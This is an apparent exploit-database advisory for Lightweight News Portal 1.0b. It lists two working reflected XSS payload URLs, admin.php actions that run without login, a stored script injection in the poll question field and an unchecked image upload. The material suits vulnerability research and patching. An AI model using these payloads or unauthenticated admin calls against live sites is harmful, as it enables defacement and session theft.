Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities

Author: storm
type: webapps
platform: php
port: 
date_added: 2008-06-19 
date_updated: 2016-12-08 
verified: 1 
codes: OSVDB-57817;CVE-2008-7172;OSVDB-57816;CVE-2008-7171;OSVDB-57815;OSVDB-57814 
tags: 
aliases:  
screenshot_url:  
application_url: 

  ____       _   _       _ ___   __                        _  __
 / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
 \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm


LNP: Lightweight news Portal v1.0-BETA
Multiple Remote Vulnerabilities


Cross-Site Scripting
--------------------

show_photo.php?photo="><script>javascript:alert(document.domain)</script>
show_potd.php?potd="><script>javascript:alert(document.domain)</script>


Insecure Administration
-----------------------

The admin page faces us with a login, but many important functions are allowed
to be executed without a logged-in session.

admin.php?A=potd_delete
admin.php?A=potd
admin.php?A=vote_update
admin.php?A=vote
admin.php?A=modifynews


Permanent Code Injection
------------------------

admin.php?A=vote

"Current question" field allows for code injection, allowing us to force
all users browsing the poll to view an XSS or browser exploit.


File Upload
-----------

admin.php?A=potd

The "picture of the day" manager allows for further images to be
uploaded, but does not check for image validity. Although a phpshell
cannot be executed through this method, a source may be uploaded for
inclusion in further attacks, possibly an LFI somewhere on the server.

# milw0rm.com [2008-06-20]